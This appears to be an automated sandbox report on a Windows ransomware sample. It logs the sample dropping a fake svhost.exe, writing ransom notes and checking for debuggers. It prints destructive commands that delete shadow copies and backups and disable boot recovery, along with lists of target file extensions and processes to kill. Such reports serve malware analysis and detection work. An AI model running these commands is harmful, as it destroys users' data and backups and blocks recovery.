                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\98j0BL6iLT.exe C:\Users\user\Desktop\98j0BL6iLT.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\svhost.exe C:\Users\user\AppData\Roaming\svhost.exe
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Windows\SysWOW64\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Windows\SysWOW64\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
                        Source: C:\Windows\SysWOW64\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /QuietJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractiveJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /QuietJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractiveJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /QuietJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractiveJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                        Source: classification engineClassification label: mal100.rans.spre.expl.evad.winEXE@20/71@0/100
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E6F730 std::ios_base::good,std::ios_base::good,task,CoInitializeEx,task,CoInitializeSecurity,CoUninitialize,task,CoCreateInstance,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,task,CoUninitialize,task,CoUninitialize,task,task,task,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,1_2_00E6F730
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile read: C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E6EA80 std::ios_base::good,CreateToolhelp32Snapshot,Process32FirstW,task,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,1_2_00E6EA80
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_01
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeMutant created: \Sessions\1\BaseNamedObjects\{8761ABBD-7F85-42EE-B272-A76179687C63}
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5456:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_01
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile written: C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.iniJump to behavior
                        Source: 98j0BL6iLT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: 98j0BL6iLT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: 98j0BL6iLT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: 98j0BL6iLT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 98j0BL6iLT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: 98j0BL6iLT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: 98j0BL6iLT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: 98j0BL6iLT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: PerfInst.pdb1 source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bootmgfw.pdb source: 98j0BL6iLT.exe, 00000000.00000003.302565986.0000000003243000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\B\127930\Acrobat\Installers\InstEntryPointBlock\Release\InstEntryPointBlock.pdb (`@ source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb A source: 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bootmgr.pdb source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bootmgr.pdbM source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003245000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\B\127930\Acrobat\Installers\Install_MaintenanceWizard\CustomActions\IWActs\Release\IWActs.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARM.pdb source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000323B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: AbcpyDll.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bootmgfw.pdbO source: 98j0BL6iLT.exe, 00000000.00000003.302565986.0000000003243000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\B\127930\Acrobat\Installers\InstEntryPointBlock\Release\InstEntryPointBlock.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb source: 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: PerfInst.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: AcroTgts.pdb source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
                        Source: 98j0BL6iLT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: 98j0BL6iLT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: 98j0BL6iLT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: 98j0BL6iLT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: 98j0BL6iLT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E8A331 push ecx; ret 1_2_00E8A344
                        Source: 98j0BL6iLT.exeBinary or memory string: [LOCKER] Lock drive vssadmin.exe Delete Shadows /All /Quietbcdedit.exe /set {default} recoveryenabled No
                        Source: 98j0BL6iLT.exeBinary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures.onelockNSIONwbadmin DELETE SYSTEMSTATEBACKUPwbadmin DELETE SYSTEMSTATEBACKUP -deleteOldestwmic.exe SHADOWCOPY /nointeractive[LOCKER] Run scanning...
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Users\user\AppData\Roaming\svhost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu Places\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\how_to_back_files.htmlJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\how_to_back_files.htmlJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\svhost.exeAPI coverage: 5.9 %
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: GetAdaptersInfo,GetAdaptersInfo,task,task,1_2_00E6D910
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: 98j0BL6iLT.exe, 00000000.00000003.329283968.000000000323D000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.336032061.000000000323F000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.386685322.0000000003238000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.326523234.000000000323D000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.393424723.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.373531329.000000000465C000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.390600940.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.349555389.000000000465F000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.430682796.000000000323A000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.291506889.0000000003236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
                        Source: 98j0BL6iLT.exeBinary or memory string: wrapper,DefWatch,ccEvtMgr,ccSetMgr,SavRoam,sqlservr,sqlagent,sqladhlp,Culserver,RTVscan,sqlbrowser,SQLADHLP,QBIDPService,Intuit.QuickBooks.FCS,QBCFMonitorService,sqlwriter,msmdsrv,tomcat6,zhudongfangyu,SQLADHLP,vmware-usbarbitator64,vmware-converter,dbsrv12,dbeng8
                        Source: 98j0BL6iLT.exeBinary or memory string: $BgIAAACkAABSU0ExAAgAAAEAAQCV9LvY1+a2rVQQKmHIYxXwltivcgEVoGHGSlKiHlpscysu4TFFZjGnMZGNZWTRb7nMG3dbHsF+AtpEqANZtrFEa7qB93oCcKf2tekVmX8LvN3iaucvPjMyGmt9pVa/t7B4lrASmVHYi0srzzdQ8TkIc26mzHrr++ZWx3RMQbz+6Elsifb2Z1fwTdpnQUJ4Otq5pxlzifT2tsB8jMTJv59N7owqCYivCq9bToZrfUdmnX+2shzyaAe6axPaVArV/j2/iRk83i2piMda86GD87AryP5fTYApA2cCP2hicRWHNCFBJW5hne5doonZ9y2gn509GMxYv9qAhB2x8a9i8p6XEncrypt file: ALLUSERSPROFILE\AppData.dll,.sys,.ini,.rdp,.encrypted,.exe,.network6,.datalock17,.datalock18,.datalock19,.datalock20,.LOCK1,.lockhyp,.LOCK1,.LOCK2,.LOCK3,.LOCK4,.LOCK5,.lockfiles1,.lockfiles2,.lockfiles3,.lockfiles4,.lockfiles5,.lockfiles6,.lockfiles7,.lockfiles8,.lockfiles9,.lockfiles10,.locklock1,.locklock2,.locklock3,.locklock4,.locklock5,.locklock6,.locklock7,.locklock8,.locklock9,.locklock10,.lockdata1,.lockdata2,.lockdata3,.lockdata4,.lockdata5,.lockdata6,.lockdata7,.lockdata8,.lockdata9,.lockdata10,.locks1,.locks2,.locks3,.locks4,.locks5,.lockies,.DLOCK,.DLOCK2,.DLOCK3,.DLOCK4,.DLOCK5,.DLOCK6,.DLOCK7,.DLOCK8,.DLOCK9,.DLOCK10,.locks6,.locks7,.locks8,.locks9,.locks10,.locks,.readlock,.nlock,.L81,.pllock,.lockis,.CNLOCK,.farlock1,.farlock2,.farlock3,.farlock4,.farlock8,.farlock9,.farlock10,.farlock11,.farlock12,.farlock13,.farlock14,.farlock16,.marlock1,.marlock2,.marlock3,.marlock4,.marlock5,.marlock6,.marlock13,.marlock14,.marlock15,.marlock17,.newnet,.farlock25,.farlock27,.farlock28,.farlock29,.newlock1,.newlock2,.newlock3,.newlock4,.newlock5,.mlock,.farlockm30,.farlock31,.farlock32,.marlock21,.marlock22,.marlock23,.marlock24,.marlock25,.farlock1,.newlock6,.newlock7,.newlock8,.newlock9,.lockzl,.lockfile,.far2,.locksss,.retlock,.lockcz,.lockpl,.far3,.far4,.newlockfiles,.far5,.far6,.lockds,.fileslock,.far7,.lockdoc,.far10,.far12,.far13,.far14,.far15,.far16,.far17,.far18,.far18,.far19,.far20,.far1,.lockfiles,.marlock1,.marlock2,.marlock3,.marlock4,.marlock5,.marlock6,.marlock7,.marlock8,.marlock9,.marlock10,.marlock01,.marlock02,.marlock03,.marlock04,.marlock05,.marlock06,.marlock07,.mlock10,.mlock11,.mlock12,.mlock13,.mlock14,.mlock15,.mlock16,.mlock17,.mlock18,.mlock19,.mlock20,.Read1,.Read2,.Read3,.Read4,.Read5,.Read6,.Read7,.Read8,.Read9,.netlock6,.netlock7,.netlock8,.netlock9,.netlock10,.netlock11,.netlock12,.netlock13,.netlock14,.netlock15,.allock8,.allock9,.piglock,.allock10,.allock01,..sickfile,.onelock,:\USERPROFILEPROGRAMFILES(x86).sql,.mdfPT_EXTENSIONS_FULLProgramData\AppDatawrapper,DefWatch,ccEvtMgr,ccSetMgr,SavRoam,sqlservr,sqlagent,sqladhlp,Culserver,RTVscan,sqlbrowser,SQLADHLP,QBIDPService,Intuit.QuickBooks.FCS,QBCFMonitorService,sqlwriter,msmdsrv,tomcat6,zhudongfangyu,SQLADHLP,vmware-usbarbitator64,vmware-converter,dbsrv12,dbeng8WINDIRSYSTEMDRIVE\Application DatawxServer.exe,wxServerView,sqlservr.exe,sqlmangr.exe,RAgui.exe,supervise.exe,Culture.exe,RTVscan.exe,Defwatch.exe,sqlbrowser.exe,winword.exe,QBW32.exe,QBDBMgr.exe,qbupdate.exe,QBCFMonitorService.exe,axlbridge.exe,QBIDPService.exe,httpd.exe,fdlauncher.exe,MsDtSrvr.exe,tomcat6.exe,java.exe,360se.
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00EA47A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00EA47A7
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E6F13F GetProcessHeap,HeapFree,1_2_00E6F13F
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00EB28E5 mov eax, dword ptr fs:[00000030h]1_2_00EB28E5
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00EA57A8 mov eax, dword ptr fs:[00000030h]1_2_00EA57A8
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E89EDD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00E89EDD
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00EA47A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00EA47A7
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /QuietJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractiveJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /QuietJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractiveJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /QuietJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractiveJump to behavior
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gHExitMaximize&Click to activateShell_TrayWndTrayNotifyWndp
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\bootTel.dat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\BCD VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\Recovery\WindowsRE\boot.sdi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Adobe\ARM\S\436\AdobeARM.msi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\BCD.LOG VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\Recovery\WindowsRE\ReAgent.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\bg-BG\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\RdrManifest3.msi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\Recovery\WindowsRE\Winre.wim VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\bg-BG\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901220034.msp VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\boot.stl VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\bootmgfw.efi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\bootmgr.efi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\cs-CZ\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\cs-CZ\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\cs-CZ\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\da-DK\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\da-DK\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\da-DK\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\de-DE\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\de-DE\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\de-DE\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\el-GR\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\el-GR\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\el-GR\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\en-GB\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\System Volume Information\tracking.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\en-GB\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\en-US\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\en-US\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\en-US\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\es-ES\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\es-ES\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\es-ES\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\es-MX\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\es-MX\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\et-EE\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\et-EE\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\fi-FI\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\fi-FI\bootmgr.efi.mui VolumeInformationJump to behavior
